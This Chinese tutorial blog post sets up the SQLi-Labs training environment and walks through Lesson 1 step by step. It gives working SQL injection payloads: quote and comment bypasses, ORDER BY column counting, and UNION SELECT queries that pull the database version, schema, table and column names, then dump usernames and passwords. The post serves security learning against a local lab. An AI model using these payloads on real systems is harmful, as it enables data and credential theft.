php7版本搭建sqli labs,SQLi-Labs环境搭建及Lesson 1

最新推荐文章于 2024-06-01 09:36:59 发布
最新推荐文章于 2024-06-01 09:36:59 发布
阅读量389 收藏
点赞数
文章标签: php7版本搭建sqli labs

一、简介

首先我们来了解一下什么是SQL注入?

所谓SQL注入,就是SQL Injection:是Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

那么,我们应该怎么学习呢?SQLi-labs会是一个不错的选择。

二、环境搭建

还需要集成环境,我使用的是phpStudy,官网:http://phpstudy.php.cn/

phpStudy装好之后,将SQLi-Labs解压,放到phpStudy安装目录下的/PHPTutorial/WWW

修改/sqli-labs/sql-connections/credb.inc文件中mysql账号密码,使之能连接上数据库

打开浏览器,输入地址http://localhost/sqli-labs/,点击 Setup/reset Database for labs ,看到如下界面,就说明环境搭建成功了~

bVbenRd?w=1442&h=854

bVbenS2?w=1443&h=853

Lesson 1 : GET - Error based - Single quotes - String

// GET-基于错误的-单引号-字符型

点击less-1,进入以下界面:

bVbenTR?w=1443&h=853

我们看到黄字提示:Please input the ID as parameter with numeric value //“请输入ID为数值的参数”

所以我们在url后输入:?id=1,回车,得到下面的页面:

bVbenUA?w=1445&h=648

说明用id=1查到对应的一些数据,实际上进行了下面的查询

select * from TABLENAME where id=1;

我们再在URL后面增加一个 ' (单引号),发现报错:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

通过查看报错信息,我们猜测可能是因为后面加的单引号没闭合导致,于是,修改URL为:

/sqli-labs/Less-1/?id=1' or 1=1 --+

bVbenWW?w=399&h=161

发现有效,--+成功注释了后面的代码,同样的,使用以下代码也成功查询到数据:

?id=1' or '1'='1

?id=1' or 1=1 --%20

?id=1' or 1=1%23

这里解释一下%23:%23是#的URL Encode得到的,和--+同是注释符。

常见URL Encode有:

%20 -> (空格)

%22 -> "

%23 -> #

%25 -> %

%27 -> '

至此,我们可以开始猜解数据库了。

1.查询字段:

?id=1' order by 5%23

bVben0J?w=367&h=34

采用折半查找,找到一个最大的不报错的数字,则为该表的字段长度,这里为3;

2.查询回显点:

?id=' union select 1,2,3%23

bVben0Q?w=309&h=134

由图可知回显点为第二、第三个字段,所以我们之后查询的内容要放在第二、第三字段才会显示;

3.查询数据库版本信息:

?id=' union select 1,version(),3%23

bVben1l?w=356&h=42

4.查询当前数据库和用户:

?id=' union select 1,database(),user()%23

bVben1t?w=463&h=82

5.查询所有数据库:

?id=' union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23

bVben1E?w=1306&h=41

6.查询表名:

?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%23

bVben1R?w=677&h=45

7.查询列名:

?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3%23

bVben12?w=585&h=40

8.查询用户名和密码:

?id=' union select 1,(select group_concat(username separator ';') from users),(select group_concat(password separator ';') from users)%23

bVben2f?w=1434&h=173

至此,猜解完毕!

一个很无聊的人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
php7版本搭建sqli labs,sqli-labs环境搭建及数据库基础
weixin_35769289的博客
03-11 479
简介SQLI-LABS是集成了多种SQL注入类型的漏洞测试环境,可以用来学习不同类型的SQL注入。1、Error Based Sql Injections - Union select type.2、Error Based Sql Injections - Double Query type.3、Boolian Based Blind Injections.4、Time Based Blind I...
PHP7版本下配置sqli-lab】
qq_40693453的博客
06-25 288
sqli-lab在php7环境下的修改
php7版本搭建sqli labs,sqli-labs-php7记录随笔0
weixin_35137190的博客
03-11 220
小白入坑网安,简单了解了Web的架构和安全知识,以及常见漏洞之后,开始搭建环境做练习。操作系统:KLinux kali 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/LinuxWeb容器:Apache/2.4.38数据库:mariadb Ver 15.1 Distrib 10.3.14-MariaD...
CentOs下安装Airflow
ooyyaa6561的博客
02-05 432
安装Airflow 1、配一下DNS,否则啥都装不了 vi /etc/resolv.conf search localdomain nameserver XXX.XXX.XX.XX 2、安装python3、pip3 安装必要工具 yum-utils ,它的功能是管理repository及扩展包的工具 (主要是针对repository)     yum install yum-utils 使用yum-builddep为Python3构建环境,安装缺失的软件依赖,使用下面的命令会自动处理     y
jeakinscheung-sqli-labs-php7-master.zip
03-16
对于这个案例,sqli-labs-php7项目可能是对原始Sqli Labs的适应性改进,以支持PHP7环境。 接下来,我们深入探讨SQL注入。SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,篡改数据库查询,从而获取...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
SQLI-LABS环境搭建
12-12
SQLI-LABS环境搭建,里面包含PhpStudy2018和sqli-labs-ma
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs-php7-master.zip
04-06
ctf比赛,web练习平台
sqli-labs平台搭建Ubuntu18.04+php7.2
01-07
sqli-labs平台搭建 坑贼多。 其实github上有docker一键搭建,但是不太推荐这样学习,首先看不了源代码,其次vulstudy那个对与我来说刚开始挺好用久了我电脑挺卡的。 搭建平台Ubuntu18.04.1+apache2.4.29+php7.2+mysql5.7.29 1、安装环境 sudo apt-get install apache2 //下载apache sudo apt-get install php7.2 //2019.7.23现在下载的都是php7.2 sudo apt-get install mysql-server //下载mysql sudo
sqli-labs 修改为php 7支持(修改为mysqli系列函数) 教程 及下载
YoseZang的博客
01-10 1660
原由 sqli-labs是流行的sql注入练习环境,但是由于使用mysql系列函数,所以在php7及以上版本不受到支持,本篇教程来讲解如何修改原版的sqli-labs来使其受到php 7及以上版本的支持。 具体操作 获取sqli-labs-master.zip原始文件包。 使用Ubuntu操作系统对其进行处理,将文件拷贝到Ubuntu系统中,并在其目录下打开Bash。使用Linux命令行工具来对sqli-labs的源代码进行处理。 执行bash命令修改源代码 mysql_query函数修改 sed
XAMPP下搭建sqli-labsphp7)
野原新之助
12-22 1090
在之前的尝试无效后,终于在网上找到了github大佬改好的 sqli-labs文件,将所有的php文件全部改为适配php7语法,因此可成功在XAMPP环境搭建
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1598
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
探索SQL注入的艺术:SQLI-LABS-PHP7深度解析与应用推荐
最新发布
gitblog_00056的博客
06-01 794
探索SQL注入的艺术:SQLI-LABS-PHP7深度解析与应用推荐 项目地址:https://gitcode.com/skyblueee/sqli-labs-php7 项目介绍 在网络安全的浩瀚宇宙中,SQL注入是一种常见的攻击手段,对于开发者和安全研究人员而言,了解并掌握其原理至关重要。SQLI-LABS-PHP7 正是为此而生,它是一个专为学习SQL注入技巧构建的实战平台。基于广受好评的SQ...
sqli lab php7,关于php7.0下Sqli-labs搭建的小问题
weixin_31815843的博客
03-24 352
由于前文中kali版本较新,默认安装的是php7.0(this is the problem)PHP 5 的使用者可以使用 mysql extension,mysqli 和 PDO_MYSQL ,但是PHP 7移除了mysql extension,只剩下后面两种选择。因此在Sqli-labs与数据库连接,查询的时候,会出现一些问题。我们安装Sqli-labs的时候必需把相关数据库的函数改为mysq...
windows中用PHPstudy安装sqli-labs
天跃
08-11 5402
注意事项:PHP版本一定要设置成7以下,7之后的mysql_都改成了mysql_**了,用7以上的都会报错。 所以这里我推荐用PHPstudy搭建sqli-labs,因为个人感觉PHPstudy改变PHP环境版本比较方便。 1.查看PHP版本及更改 2.下载sqli-labs:https://github.com/Audi-1/sqli-labs 3.安装sqli-labs ...
phpstudy 搭建 sqli-labs SQL 注入靶场
两个月亮
12-25 1043
在过去,如果文件的名称仅大小写不同,则 Windows 将无法访问这些文件,因为 Windows 应用程序将文件系统视为不区分大小写,并且无法区分名称仅大小写不同的文件。所以刚刚的 Warning 是在提醒我们,GitHub 中的目标项目中的某个文件夹中出现了有大小写之分的同名文件。Windows 的文件系统默认是对文件夹大小写不敏感的,也就是说 Class 文件夹与 class 会被认为是同一个文件夹,不单单是文件夹,对文件也是这样的。,使用 cd 命令切换到将用来安装项目文件的目录下。
sqli-labs-less-7
09-26
在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值